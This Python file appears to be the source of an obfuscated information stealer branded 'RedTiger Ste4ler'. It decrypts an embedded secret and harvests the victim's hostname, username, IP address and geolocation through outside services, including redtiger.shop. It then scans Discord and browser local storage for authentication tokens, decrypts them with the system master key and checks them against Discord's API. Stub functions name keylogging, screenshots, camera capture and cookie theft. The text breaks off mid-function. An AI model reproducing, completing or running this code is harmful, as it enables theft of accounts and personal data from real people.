
import sys

def On1y_W1nd0w5():
    if sys.platform.startswith("win"):
        return False
    else:
        return True

try: OGDJJRYAFDBBMIXSYDMOORLPNRQZYMPZKNUOPWURDSMYQEPOIRNABWLFCTWMIZFYEQYGVHURAYCRSLAHUAI = On1y_W1nd0w5()
except: OGDJJRYAFDBBMIXSYDMOORLPNRQZYMPZKNUOPWURDSMYQEPOIRNABWLFCTWMIZFYEQYGVHURAYCRSLAHUAI = False

if OGDJJRYAFDBBMIXSYDMOORLPNRQZYMPZKNUOPWURDSMYQEPOIRNABWLFCTWMIZFYEQYGVHURAYCRSLAHUAI == True:
    sys.exit()
    
import os
import socket
import win32api
import requests
import threading
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.backends import default_backend
import base64

def B10ck_K3y(): pass
def Unb10ck_K3y(): pass
def B10ck_T45k_M4n4g3r(): pass
def B10ck_M0u53(): pass
def B10ck_W3b5it3(): pass
def St4rtup(): pass
def Sy5t3m_Inf0(): pass
def Op3n_U53r_Pr0fi13_53tting5(): pass
def Scr33n5h0t(): pass
def C4m3r4_C4ptur3(): pass
def Di5c0rd_T0k3n(): pass
def Di5c0rd_inj3c710n(): pass
def Br0w53r_5t341(): pass
def R0b10x_C00ki3(): pass
def F4k3_3rr0r(): pass
def Sp4m_0p3n_Pr0gr4m(): pass
def Sp4m_Cr34t_Fil3(): pass
def Shutd0wn(): pass
def Sp4m_Opti0ns(): pass
def R3st4rt(): pass

def Clear():
    try:
        if sys.platform.startswith("win"):
            os.system("cls")
        elif sys.platform.startswith("linux"):
            os.system("clear")
    except:
        pass

def Decrypt(XZIVGWUOPYQGWKYMHUGZKRZHIGSEFCRQUNBXZSUSWPFKTHOXEUHLFIYZXRNYCMQBRHNKWLUSDOZTVQENHNVTK, v4r_key):
    def DeriveKey(v4r_password, v4r_salt):
        v4r_kdf = PBKDF2HMAC(algorithm=hashes.SHA256(), length=32, salt=v4r_salt, iterations=100000, backend=default_backend())
        if isinstance(v4r_password, str):  
            v4r_password = v4r_password.encode()  
        return v4r_kdf.derive(v4r_password)

    XZIVGWUOPYQGWKYMHUGZKRZHIGSEFCRQUNBXZSUSWPFKTHOXEUHLFIYZXRNYCMQBRHNKWLUSDOZTVQENHNVTK_data = base64.b64decode(XZIVGWUOPYQGWKYMHUGZKRZHIGSEFCRQUNBXZSUSWPFKTHOXEUHLFIYZXRNYCMQBRHNKWLUSDOZTVQENHNVTK)
    v4r_salt = XZIVGWUOPYQGWKYMHUGZKRZHIGSEFCRQUNBXZSUSWPFKTHOXEUHLFIYZXRNYCMQBRHNKWLUSDOZTVQENHNVTK_data[:16]
    v4r_iv = XZIVGWUOPYQGWKYMHUGZKRZHIGSEFCRQUNBXZSUSWPFKTHOXEUHLFIYZXRNYCMQBRHNKWLUSDOZTVQENHNVTK_data[16:32]
    XZIVGWUOPYQGWKYMHUGZKRZHIGSEFCRQUNBXZSUSWPFKTHOXEUHLFIYZXRNYCMQBRHNKWLUSDOZTVQENHNVTK_data = XZIVGWUOPYQGWKYMHUGZKRZHIGSEFCRQUNBXZSUSWPFKTHOXEUHLFIYZXRNYCMQBRHNKWLUSDOZTVQENHNVTK_data[32:]
    v4r_derived_key = DeriveKey(v4r_key, v4r_salt)
    v4r_cipher = Cipher(algorithms.AES(v4r_derived_key), modes.CBC(v4r_iv), backend=default_backend())
    v4r_decryptor = v4r_cipher.decryptor()
    v4r_decrypted_data = v4r_decryptor.update(XZIVGWUOPYQGWKYMHUGZKRZHIGSEFCRQUNBXZSUSWPFKTHOXEUHLFIYZXRNYCMQBRHNKWLUSDOZTVQENHNVTK_data) + v4r_decryptor.finalize()
    v4r_unpadder = padding.PKCS7(128).unpadder()
    v4r_original_data = v4r_unpadder.update(v4r_decrypted_data) + v4r_unpadder.finalize()
    return v4r_original_data.decode()

EGMNTAEIPAOQFJMYRUMPQULSEULALLLWFIIFRTEQHTBABUROLBLZCKTRZHBSNMDIZYZKCL = r"""
0cIzboyqX+cIiKxdt23ld/+Ok9UuLCdCEK7oTeOmMXbR01dUaVUJ6CEVqWXeO/2lrWIcf0FzPX/icmpZY2y0/dMeheQcq7FyEkA3CI4u3VE=
"""
CWBPBIPLENNKWHUPQGHBFARWCXXZAHKYIWXWVDJWVPXUIBIEXNGDCWKFNQLRJKPKAXWTTAKSKSRJWTBSOBR = "ZSwEJCMSSNExspHwTRBFSlwXGaemFIhFVkYxNGLVuwSetggnsTeEbRSNVzyBZLmwdonMqFlqfFYWYklbnXTJvFrLbNjGFQtnADbZaciJuaeAGdsHZfkrLjrRSjQbvadoEglfSrIj"
PSGKJIZXUYBZOTQIPRPOTJGGOBNMIHYXZTHMAMSVCQLODWGRHHEXDNZARWFZRBTMWVANHCKLBOPTWWDPREMS = "redtiger.shop"
DYYJNOODIRRNJIMFFKAPWJVJOLGUDXYLUWVVJKPFNJPBAQKZXPJFRJWIYEGPYWXSBEX = 0xa80505
CGTTQKDOHQKBVQZQKOHAIUNJLGNWOPIHTPLVNQNSZMKGFGHUZQXNKTMGFOHABAHYGOICUTWLJEOOADFERLEFOEIELYRJWDYF = "RedTiger Ste4ler"
QOLVKKQIAJDOYVDRESETHAUKQYKLEXNVJMBKTNHTNVNIHEYCCBQ = "https://cdn.discordapp.com/attachments/1268900329605300234/1276010081665683497/RedTiger-Logo.png?ex=66cf38be&is=66cde73e&hm=696c53b4791044ca0495d87f92e6d603e8383315d2ebdd385aaccfc6dbf6aa77&"
UQNIKGREAMWSDRRWEOGXJXLXTQRFXWFUSZENMCFQJGITHRENYRQBMPZQLHRU = "RedTiger Ste4ler - github.com/loxy0dev/RedTiger-Tools"
MBDDWXRVLABEMZAFAICDAFXFBYPVZKOWZQWDVXXULAYPMXALSFZNFJKCSDTEVRNWVIPW = {
        "text": UQNIKGREAMWSDRRWEOGXJXLXTQRFXWFUSZENMCFQJGITHRENYRQBMPZQLHRU,
        "icon_url": QOLVKKQIAJDOYVDRESETHAUKQYKLEXNVJMBKTNHTNVNIHEYCCBQ,
        }
                 
IRVSXQEWORQNCPNYJWXUARMTWBVSIBTHPIGCGNNIBMVPQILTZJDKCJNRFCOVXTMKVRAONNJTXPVPOQX = Decrypt(EGMNTAEIPAOQFJMYRUMPQULSEULALLLWFIIFRTEQHTBABUROLBLZCKTRZHBSNMDIZYZKCL, CWBPBIPLENNKWHUPQGHBFARWCXXZAHKYIWXWVDJWVPXUIBIEXNGDCWKFNQLRJKPKAXWTTAKSKSRJWTBSOBR)

try: AXNJWIHFQTZJVKOQFAFCNSUORVGKBSGIFQBNFFTPDCZTCKSUMELHDNCEXJFBRQWEYOSLIAL = socket.gethostname()
except: AXNJWIHFQTZJVKOQFAFCNSUORVGKBSGIFQBNFFTPDCZTCKSUMELHDNCEXJFBRQWEYOSLIAL = "None"

try: XJSLVQNQTGIKEGBIFMHZXVESMILUPDZMVSBRUTTUSDVISDAJLHRAQYGRELMJDVSLHUIYGTVGYSEWELPRQRZLUWFW = os.getlogin()
except: XJSLVQNQTGIKEGBIFMHZXVESMILUPDZMVSBRUTTUSDVISDAJLHRAQYGRELMJDVSLHUIYGTVGYSEWELPRQRZLUWFW = "None"

try: QSRCKYMTIXYYAZUQJJFCATENKLNQLSMLUKLERWZZZGIJHZJZSZBAKMKPSEBSNLMUITFOEOEJZIGDLBGRMEMCGKGXFXIQSBVJGD = win32api.GetUserNameEx(win32api.NameDisplay)
except: QSRCKYMTIXYYAZUQJJFCATENKLNQLSMLUKLERWZZZGIJHZJZSZBAKMKPSEBSNLMUITFOEOEJZIGDLBGRMEMCGKGXFXIQSBVJGD = "None"

try: NZPBHKLPXUONPGQBWBHDLQWGJJVHWAVGGTHPMXHMBYRJNJDXUMCZUBSDICQEIDNDWVEIYUMUACVSTEAPQT = requests.get("https://api.ipify.org?format=json").json().get("ip", "None")
except: NZPBHKLPXUONPGQBWBHDLQWGJJVHWAVGGTHPMXHMBYRJNJDXUMCZUBSDICQEIDNDWVEIYUMUACVSTEAPQT = "None"

try: XETAEUXMQSUFMIGQJZHNPJBEPGIWEDOGSKREDPPXXOWKREHCHPTTJL = socket.gethostbyname(socket.gethostname())
except: XETAEUXMQSUFMIGQJZHNPJBEPGIWEDOGSKREDPPXXOWKREHCHPTTJL = "None"

try:
    TORTHIZWIKAJOEUNMUALYMHNGVBILYENCKVCDWZGLISUBVFRBHDLFDUHKWMGIEWPDMCISRYEMGFTQDPKHPL = requests.get(f"https://{PSGKJIZXUYBZOTQIPRPOTJGGOBNMIHYXZTHMAMSVCQLODWGRHHEXDNZARWFZRBTMWVANHCKLBOPTWWDPREMS}/api/ip/ip={NZPBHKLPXUONPGQBWBHDLQWGJJVHWAVGGTHPMXHMBYRJNJDXUMCZUBSDICQEIDNDWVEIYUMUACVSTEAPQT}")
    MRUJZEDHXXJEQVIGZJVEDHVAANLQBPRVIAMVJSLSZJVDNBYMXOEXNVBSGBRNNKGLMBJTMXWNNQYADHQPEHJVACISDZ = TORTHIZWIKAJOEUNMUALYMHNGVBILYENCKVCDWZGLISUBVFRBHDLFDUHKWMGIEWPDMCISRYEMGFTQDPKHPL.json()

    HGAGPHFEVEAPGOENFJAMTWLQSHWCAKFFLRJPLMHQJTZYWJDQKLUNHBJUYGDLBGXNDMZXALFEXLQQPCRQKITWSHP = MRUJZEDHXXJEQVIGZJVEDHVAANLQBPRVIAMVJSLSZJVDNBYMXOEXNVBSGBRNNKGLMBJTMXWNNQYADHQPEHJVACISDZ.get('country', "None")
    HGAGPHFEVEAPGOENFJAMTWLQSHWCAKFFLRJPLMHQJTZYWJDQKLUNHBJUYGDLBGXNDMZXALFEXLQQPCRQKITWSHP_code = MRUJZEDHXXJEQVIGZJVEDHVAANLQBPRVIAMVJSLSZJVDNBYMXOEXNVBSGBRNNKGLMBJTMXWNNQYADHQPEHJVACISDZ.get('country_code', "None")
    YCVFLJFKSYUDNPSCTKDGAABFVLLILZBMXKFZEDITYZILRPZXRDLYOHEHZBPMODXOEDXTRKQFHMLPXZUSIADWKCSJJAJIANL = MRUJZEDHXXJEQVIGZJVEDHVAANLQBPRVIAMVJSLSZJVDNBYMXOEXNVBSGBRNNKGLMBJTMXWNNQYADHQPEHJVACISDZ.get('region', "None")
    YCVFLJFKSYUDNPSCTKDGAABFVLLILZBMXKFZEDITYZILRPZXRDLYOHEHZBPMODXOEDXTRKQFHMLPXZUSIADWKCSJJAJIANL_code = MRUJZEDHXXJEQVIGZJVEDHVAANLQBPRVIAMVJSLSZJVDNBYMXOEXNVBSGBRNNKGLMBJTMXWNNQYADHQPEHJVACISDZ.get('region_code', "None")
    DLPLCLSDBWSQNYVJIEQYQOOANWOIKXYXVHNDBEWHLLGGURBQBKHPVFLTIS = MRUJZEDHXXJEQVIGZJVEDHVAANLQBPRVIAMVJSLSZJVDNBYMXOEXNVBSGBRNNKGLMBJTMXWNNQYADHQPEHJVACISDZ.get('zip', "None")
    PGUTUPKANCABDDNFACNPWMYZRYRQMIPXODSZSQLRHIZKWIADIFDWUCVWZID = MRUJZEDHXXJEQVIGZJVEDHVAANLQBPRVIAMVJSLSZJVDNBYMXOEXNVBSGBRNNKGLMBJTMXWNNQYADHQPEHJVACISDZ.get('city', "None")
    SJENQYKKSALWWENZSAAGOSQDJJDDWTBTVTXQFTFNLXWJKJXSKJMIXENJNGYXHVUHJPQAMGNYKUZCOQUZBZDBOAUXPDZSDFSED = MRUJZEDHXXJEQVIGZJVEDHVAANLQBPRVIAMVJSLSZJVDNBYMXOEXNVBSGBRNNKGLMBJTMXWNNQYADHQPEHJVACISDZ.get('latitude', "None")
    TIVRRNQNPBGGNODDPORMGAEWEIMZJLXCCJKSNKXLDGFNRHRJWOTDELXHAKSAVGJTSCZQKT = MRUJZEDHXXJEQVIGZJVEDHVAANLQBPRVIAMVJSLSZJVDNBYMXOEXNVBSGBRNNKGLMBJTMXWNNQYADHQPEHJVACISDZ.get('longitude', "None")
    VYUJHNCQUNHDNTQQYEURPOPUBTJJQTZVAUFGTEVURUUAKAPMQVIQQJFGHOSDCMILPMODIDEMIXGRZ = MRUJZEDHXXJEQVIGZJVEDHVAANLQBPRVIAMVJSLSZJVDNBYMXOEXNVBSGBRNNKGLMBJTMXWNNQYADHQPEHJVACISDZ.get('timezone', "None")
    JAKUGKLNJCQHOEBTTWMFNCLNUCJXZEPJJSRWLSQQLOYCBKRKQTQFDZSAROYQJONSWFUCKCZQATHHLMMHFSJJEQYARDLBGRGOTX = MRUJZEDHXXJEQVIGZJVEDHVAANLQBPRVIAMVJSLSZJVDNBYMXOEXNVBSGBRNNKGLMBJTMXWNNQYADHQPEHJVACISDZ.get('isp', "None")
    KDNZBRLUZBRYJZIKRSPYGOAFCOUUZGWMXDMCAUTTGEAJUOLEVJUKNJ = MRUJZEDHXXJEQVIGZJVEDHVAANLQBPRVIAMVJSLSZJVDNBYMXOEXNVBSGBRNNKGLMBJTMXWNNQYADHQPEHJVACISDZ.get('org', "None")
    LSPLHSFJXWFAVFEOYZQPJUODEQRVANEMGANKJZUKLZZJLAESHEPISERTDIDQLNGRCHADLLRIMMAGTBFTSMQFVKFQDMEORGIVJMBQ = MRUJZEDHXXJEQVIGZJVEDHVAANLQBPRVIAMVJSLSZJVDNBYMXOEXNVBSGBRNNKGLMBJTMXWNNQYADHQPEHJVACISDZ.get('as', "None")
except:
    TORTHIZWIKAJOEUNMUALYMHNGVBILYENCKVCDWZGLISUBVFRBHDLFDUHKWMGIEWPDMCISRYEMGFTQDPKHPL = requests.get(f"http://ip-api.com/json/{NZPBHKLPXUONPGQBWBHDLQWGJJVHWAVGGTHPMXHMBYRJNJDXUMCZUBSDICQEIDNDWVEIYUMUACVSTEAPQT}")
    MRUJZEDHXXJEQVIGZJVEDHVAANLQBPRVIAMVJSLSZJVDNBYMXOEXNVBSGBRNNKGLMBJTMXWNNQYADHQPEHJVACISDZ = TORTHIZWIKAJOEUNMUALYMHNGVBILYENCKVCDWZGLISUBVFRBHDLFDUHKWMGIEWPDMCISRYEMGFTQDPKHPL.json()

    HGAGPHFEVEAPGOENFJAMTWLQSHWCAKFFLRJPLMHQJTZYWJDQKLUNHBJUYGDLBGXNDMZXALFEXLQQPCRQKITWSHP = MRUJZEDHXXJEQVIGZJVEDHVAANLQBPRVIAMVJSLSZJVDNBYMXOEXNVBSGBRNNKGLMBJTMXWNNQYADHQPEHJVACISDZ.get('country', "None")
    HGAGPHFEVEAPGOENFJAMTWLQSHWCAKFFLRJPLMHQJTZYWJDQKLUNHBJUYGDLBGXNDMZXALFEXLQQPCRQKITWSHP_code = MRUJZEDHXXJEQVIGZJVEDHVAANLQBPRVIAMVJSLSZJVDNBYMXOEXNVBSGBRNNKGLMBJTMXWNNQYADHQPEHJVACISDZ.get('countryCode', "None")
    YCVFLJFKSYUDNPSCTKDGAABFVLLILZBMXKFZEDITYZILRPZXRDLYOHEHZBPMODXOEDXTRKQFHMLPXZUSIADWKCSJJAJIANL = MRUJZEDHXXJEQVIGZJVEDHVAANLQBPRVIAMVJSLSZJVDNBYMXOEXNVBSGBRNNKGLMBJTMXWNNQYADHQPEHJVACISDZ.get('regionName', "None")
    YCVFLJFKSYUDNPSCTKDGAABFVLLILZBMXKFZEDITYZILRPZXRDLYOHEHZBPMODXOEDXTRKQFHMLPXZUSIADWKCSJJAJIANL_code = MRUJZEDHXXJEQVIGZJVEDHVAANLQBPRVIAMVJSLSZJVDNBYMXOEXNVBSGBRNNKGLMBJTMXWNNQYADHQPEHJVACISDZ.get('region', "None")
    DLPLCLSDBWSQNYVJIEQYQOOANWOIKXYXVHNDBEWHLLGGURBQBKHPVFLTIS = MRUJZEDHXXJEQVIGZJVEDHVAANLQBPRVIAMVJSLSZJVDNBYMXOEXNVBSGBRNNKGLMBJTMXWNNQYADHQPEHJVACISDZ.get('zip', "None")
    PGUTUPKANCABDDNFACNPWMYZRYRQMIPXODSZSQLRHIZKWIADIFDWUCVWZID = MRUJZEDHXXJEQVIGZJVEDHVAANLQBPRVIAMVJSLSZJVDNBYMXOEXNVBSGBRNNKGLMBJTMXWNNQYADHQPEHJVACISDZ.get('city', "None")
    SJENQYKKSALWWENZSAAGOSQDJJDDWTBTVTXQFTFNLXWJKJXSKJMIXENJNGYXHVUHJPQAMGNYKUZCOQUZBZDBOAUXPDZSDFSED = MRUJZEDHXXJEQVIGZJVEDHVAANLQBPRVIAMVJSLSZJVDNBYMXOEXNVBSGBRNNKGLMBJTMXWNNQYADHQPEHJVACISDZ.get('lat', "None")
    TIVRRNQNPBGGNODDPORMGAEWEIMZJLXCCJKSNKXLDGFNRHRJWOTDELXHAKSAVGJTSCZQKT = MRUJZEDHXXJEQVIGZJVEDHVAANLQBPRVIAMVJSLSZJVDNBYMXOEXNVBSGBRNNKGLMBJTMXWNNQYADHQPEHJVACISDZ.get('lon', "None")
    VYUJHNCQUNHDNTQQYEURPOPUBTJJQTZVAUFGTEVURUUAKAPMQVIQQJFGHOSDCMILPMODIDEMIXGRZ = MRUJZEDHXXJEQVIGZJVEDHVAANLQBPRVIAMVJSLSZJVDNBYMXOEXNVBSGBRNNKGLMBJTMXWNNQYADHQPEHJVACISDZ.get('timezone', "None")
    JAKUGKLNJCQHOEBTTWMFNCLNUCJXZEPJJSRWLSQQLOYCBKRKQTQFDZSAROYQJONSWFUCKCZQATHHLMMHFSJJEQYARDLBGRGOTX = MRUJZEDHXXJEQVIGZJVEDHVAANLQBPRVIAMVJSLSZJVDNBYMXOEXNVBSGBRNNKGLMBJTMXWNNQYADHQPEHJVACISDZ.get('isp', "None")
    KDNZBRLUZBRYJZIKRSPYGOAFCOUUZGWMXDMCAUTTGEAJUOLEVJUKNJ = MRUJZEDHXXJEQVIGZJVEDHVAANLQBPRVIAMVJSLSZJVDNBYMXOEXNVBSGBRNNKGLMBJTMXWNNQYADHQPEHJVACISDZ.get('org', "None")
    LSPLHSFJXWFAVFEOYZQPJUODEQRVANEMGANKJZUKLZZJLAESHEPISERTDIDQLNGRCHADLLRIMMAGTBFTSMQFVKFQDMEORGIVJMBQ = MRUJZEDHXXJEQVIGZJVEDHVAANLQBPRVIAMVJSLSZJVDNBYMXOEXNVBSGBRNNKGLMBJTMXWNNQYADHQPEHJVACISDZ.get('as', "None")

def Di5c0rd_T0k3n():
    import os
    import re
    import json
    import base64
    import requests
    from Cryptodome.Cipher import AES
    from Cryptodome.Protocol.KDF import scrypt
    from win32crypt import CryptUnprotectData
    from discord import SyncWebhook, Embed

    def extr4ct_t0k3n5():
        VHQOJTBHCCHWDXKFPJSHVGVMRVSPQRGXUSXVHNGLBEUHRGOKDFUQMJXEOXLNKXWGANV = "https://discord.com/api/v9/users/@me"
        WCIHGZKRGJTWXUIZXXNKRTLBFIFCPYVRUFSLFQBADGXPITDSMCYLENBTBXMHHDMFPPQFQBYYARLSXALMANATMMJOXDNLJT = os.getenv("localappdata")
        FFPUONROQXTELABOJOTGOCKKFXBTEDGLIFJGUWEOWLJFLZXTKAZRDOKIJXN = os.getenv("appdata")
        VDSOHXYWIAKADEWGWKYFXNKOJOCYZUQUKUIRZHMLDNVJQYENEXQHYAUXIDOWQNXEMAMMICAXEJOYZZTIUJGDHV = r"[\w-]{24}\.[\w-]{6}\.[\w-]{25,110}"
        VDSOHXYWIAKADEWGWKYFXNKOJOCYZUQUKUIRZHMLDNVJQYENEXQHYAUXIDOWQNXEMAMMICAXEJOYZZTIUJGDHV_enc = r"dQw4w9WgXcQ:[^\"]*"
        QWFTACTSGDMATTDKFFZJUNVGIUPSLXVLFMASGYAGJBEWINQLJQYPSZMMMTICZNLOSEGOCHHWJBCDDDMAUFQERWPQCWTVXW = []
        TQIPQMSCFZYGZSVHXDHSQQMDEVWVMGQVDLIKYSBPBFXQYLENREVSSUC = []
        UCHROWMYYZLWOIZHSHCEKILYHNGPUFEIYKLKBTGNQRRIPDIRZA = {}

        FYBRALSAGNTQBHDYBUKPWCVSJQKKOEXKORPAXVFSKJVJWSYJOICFUZJUJNLRGEODLQW = {
            'Discord': FFPUONROQXTELABOJOTGOCKKFXBTEDGLIFJGUWEOWLJFLZXTKAZRDOKIJXN + '\\discord\\Local Storage\\leveldb\\',
            'Discord Canary': FFPUONROQXTELABOJOTGOCKKFXBTEDGLIFJGUWEOWLJFLZXTKAZRDOKIJXN + '\\discordcanary\\Local Storage\\leveldb\\',
            'Lightcord': FFPUONROQXTELABOJOTGOCKKFXBTEDGLIFJGUWEOWLJFLZXTKAZRDOKIJXN + '\\Lightcord\\Local Storage\\leveldb\\',
            'Discord PTB': FFPUONROQXTELABOJOTGOCKKFXBTEDGLIFJGUWEOWLJFLZXTKAZRDOKIJXN + '\\discordptb\\Local Storage\\leveldb\\',
            'Opera': FFPUONROQXTELABOJOTGOCKKFXBTEDGLIFJGUWEOWLJFLZXTKAZRDOKIJXN + '\\Opera Software\\Opera Stable\\Local Storage\\leveldb\\',
            'Opera GX': FFPUONROQXTELABOJOTGOCKKFXBTEDGLIFJGUWEOWLJFLZXTKAZRDOKIJXN + '\\Opera Software\\Opera GX Stable\\Local Storage\\leveldb\\',
            'Amigo': WCIHGZKRGJTWXUIZXXNKRTLBFIFCPYVRUFSLFQBADGXPITDSMCYLENBTBXMHHDMFPPQFQBYYARLSXALMANATMMJOXDNLJT + '\\Amigo\\User Data\\Local Storage\\leveldb\\',
            'Torch': WCIHGZKRGJTWXUIZXXNKRTLBFIFCPYVRUFSLFQBADGXPITDSMCYLENBTBXMHHDMFPPQFQBYYARLSXALMANATMMJOXDNLJT + '\\Torch\\User Data\\Local Storage\\leveldb\\',
            'Kometa': WCIHGZKRGJTWXUIZXXNKRTLBFIFCPYVRUFSLFQBADGXPITDSMCYLENBTBXMHHDMFPPQFQBYYARLSXALMANATMMJOXDNLJT + '\\Kometa\\User Data\\Local Storage\\leveldb\\',
            'Orbitum': WCIHGZKRGJTWXUIZXXNKRTLBFIFCPYVRUFSLFQBADGXPITDSMCYLENBTBXMHHDMFPPQFQBYYARLSXALMANATMMJOXDNLJT + '\\Orbitum\\User Data\\Local Storage\\leveldb\\',
            'CentBrowser': WCIHGZKRGJTWXUIZXXNKRTLBFIFCPYVRUFSLFQBADGXPITDSMCYLENBTBXMHHDMFPPQFQBYYARLSXALMANATMMJOXDNLJT + '\\CentBrowser\\User Data\\Local Storage\\leveldb\\',
            '7Star': WCIHGZKRGJTWXUIZXXNKRTLBFIFCPYVRUFSLFQBADGXPITDSMCYLENBTBXMHHDMFPPQFQBYYARLSXALMANATMMJOXDNLJT + '\\7Star\\7Star\\User Data\\Local Storage\\leveldb\\',
            'Sputnik': WCIHGZKRGJTWXUIZXXNKRTLBFIFCPYVRUFSLFQBADGXPITDSMCYLENBTBXMHHDMFPPQFQBYYARLSXALMANATMMJOXDNLJT + '\\Sputnik\\Sputnik\\User Data\\Local Storage\\leveldb\\',
            'Vivaldi': WCIHGZKRGJTWXUIZXXNKRTLBFIFCPYVRUFSLFQBADGXPITDSMCYLENBTBXMHHDMFPPQFQBYYARLSXALMANATMMJOXDNLJT + '\\Vivaldi\\User Data\\Default\\Local Storage\\leveldb\\',
            'Google Chrome SxS': WCIHGZKRGJTWXUIZXXNKRTLBFIFCPYVRUFSLFQBADGXPITDSMCYLENBTBXMHHDMFPPQFQBYYARLSXALMANATMMJOXDNLJT + '\\Google\\Chrome SxS\\User Data\\Local Storage\\leveldb\\',
            'Google Chrome': WCIHGZKRGJTWXUIZXXNKRTLBFIFCPYVRUFSLFQBADGXPITDSMCYLENBTBXMHHDMFPPQFQBYYARLSXALMANATMMJOXDNLJT + '\\Google\\Chrome\\User Data\\Default\\Local Storage\\leveldb\\',
            'Google Chrome1': WCIHGZKRGJTWXUIZXXNKRTLBFIFCPYVRUFSLFQBADGXPITDSMCYLENBTBXMHHDMFPPQFQBYYARLSXALMANATMMJOXDNLJT + '\\Google\\Chrome\\User Data\\Profile 1\\Local Storage\\leveldb\\',
            'Google Chrome2': WCIHGZKRGJTWXUIZXXNKRTLBFIFCPYVRUFSLFQBADGXPITDSMCYLENBTBXMHHDMFPPQFQBYYARLSXALMANATMMJOXDNLJT + '\\Google\\Chrome\\User Data\\Profile 2\\Local Storage\\leveldb\\',
            'Google Chrome3': WCIHGZKRGJTWXUIZXXNKRTLBFIFCPYVRUFSLFQBADGXPITDSMCYLENBTBXMHHDMFPPQFQBYYARLSXALMANATMMJOXDNLJT + '\\Google\\Chrome\\User Data\\Profile 3\\Local Storage\\leveldb\\',
            'Google Chrome4': WCIHGZKRGJTWXUIZXXNKRTLBFIFCPYVRUFSLFQBADGXPITDSMCYLENBTBXMHHDMFPPQFQBYYARLSXALMANATMMJOXDNLJT + '\\Google\\Chrome\\User Data\\Profile 4\\Local Storage\\leveldb\\',
            'Google Chrome5': WCIHGZKRGJTWXUIZXXNKRTLBFIFCPYVRUFSLFQBADGXPITDSMCYLENBTBXMHHDMFPPQFQBYYARLSXALMANATMMJOXDNLJT + '\\Google\\Chrome\\User Data\\Profile 5\\Local Storage\\leveldb\\',
            'Epic Privacy Browser': WCIHGZKRGJTWXUIZXXNKRTLBFIFCPYVRUFSLFQBADGXPITDSMCYLENBTBXMHHDMFPPQFQBYYARLSXALMANATMMJOXDNLJT + '\\Epic Privacy Browser\\User Data\\Local Storage\\leveldb\\',
            'Microsoft Edge': WCIHGZKRGJTWXUIZXXNKRTLBFIFCPYVRUFSLFQBADGXPITDSMCYLENBTBXMHHDMFPPQFQBYYARLSXALMANATMMJOXDNLJT + '\\Microsoft\\Edge\\User Data\\Default\\Local Storage\\leveldb\\',
            'Uran': WCIHGZKRGJTWXUIZXXNKRTLBFIFCPYVRUFSLFQBADGXPITDSMCYLENBTBXMHHDMFPPQFQBYYARLSXALMANATMMJOXDNLJT + '\\uCozMedia\\Uran\\User Data\\Default\\Local Storage\\leveldb\\',
            'Yandex': WCIHGZKRGJTWXUIZXXNKRTLBFIFCPYVRUFSLFQBADGXPITDSMCYLENBTBXMHHDMFPPQFQBYYARLSXALMANATMMJOXDNLJT + '\\Yandex\\YandexBrowser\\User Data\\Default\\Local Storage\\leveldb\\',
            'Brave': WCIHGZKRGJTWXUIZXXNKRTLBFIFCPYVRUFSLFQBADGXPITDSMCYLENBTBXMHHDMFPPQFQBYYARLSXALMANATMMJOXDNLJT + '\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Local Storage\\leveldb\\',
            'Iridium': WCIHGZKRGJTWXUIZXXNKRTLBFIFCPYVRUFSLFQBADGXPITDSMCYLENBTBXMHHDMFPPQFQBYYARLSXALMANATMMJOXDNLJT + '\\Iridium\\User Data\\Default\\Local Storage\\leveldb\\'
        }

        for VJUUQZNCXYHLOOSYFEAKEIWRHTWHGUNUADIWUAPOAZVDXMJJUODADMFBMDEMJDODEFXIGWAYOVXJHKGJ, QKAJJWFKITFIVBMOYRVMBUCUIHPICSTODWEROENRAZYDTKRAKFZXFDGQULNPMGPKRGIJMDKHH in FYBRALSAGNTQBHDYBUKPWCVSJQKKOEXKORPAXVFSKJVJWSYJOICFUZJUJNLRGEODLQW.items():
            if not os.path.exists(QKAJJWFKITFIVBMOYRVMBUCUIHPICSTODWEROENRAZYDTKRAKFZXFDGQULNPMGPKRGIJMDKHH):
                continue
            UWMDHEBWMEFBWEIWKMRTGTPIJQRVGWDRGVCRCNBPQCAYTQFGJLRWUQDFR = VJUUQZNCXYHLOOSYFEAKEIWRHTWHGUNUADIWUAPOAZVDXMJJUODADMFBMDEMJDODEFXIGWAYOVXJHKGJ.replace(" ", "").lower()
            if "cord" in QKAJJWFKITFIVBMOYRVMBUCUIHPICSTODWEROENRAZYDTKRAKFZXFDGQULNPMGPKRGIJMDKHH:
                if not os.path.exists(FFPUONROQXTELABOJOTGOCKKFXBTEDGLIFJGUWEOWLJFLZXTKAZRDOKIJXN + f'\\{UWMDHEBWMEFBWEIWKMRTGTPIJQRVGWDRGVCRCNBPQCAYTQFGJLRWUQDFR}\\Local State'):
                    continue
                for v4r_file_name in os.listdir(QKAJJWFKITFIVBMOYRVMBUCUIHPICSTODWEROENRAZYDTKRAKFZXFDGQULNPMGPKRGIJMDKHH):
                    if v4r_file_name[-3:] not in ["log", "ldb"]:
                        continue
                    with open(f'{QKAJJWFKITFIVBMOYRVMBUCUIHPICSTODWEROENRAZYDTKRAKFZXFDGQULNPMGPKRGIJMDKHH}\\{v4r_file_name}', errors='ignore') as v4r_file:
                        for v4r_line in v4r_file:
                            for y in re.findall(VDSOHXYWIAKADEWGWKYFXNKOJOCYZUQUKUIRZHMLDNVJQYENEXQHYAUXIDOWQNXEMAMMICAXEJOYZZTIUJGDHV_enc, v4r_line.strip()):
                                SNMDXMVKHUOKDWKZBWDUEGJNWXNOJZYIQBIUZCXRINSMLXVAVJSNQOZYQFWLMOPJKYNHENZNIDW = decrypt_val(base64.b64decode(y.split('dQw4w9WgXcQ:')[1]), get_master_key(FFPUONROQXTELABOJOTGOCKKFXBTEDGLIFJGUWEOWLJFLZXTKAZRDOKIJXN + f'\\{UWMDHEBWMEFBWEIWKMRTGTPIJQRVGWDRGVCRCNBPQCAYTQFGJLRWUQDFR}\\Local State'))
                                if validate_t0k3n(SNMDXMVKHUOKDWKZBWDUEGJNWXNOJZYIQBIUZCXRINSMLXVAVJSNQOZYQFWLMOPJKYNHENZNIDW, VHQOJTBHCCHWDXKFPJSHVGVMRVSPQRGXUSXVHNGLBEUHRGOKDFUQMJXEOXLNKXWGANV):
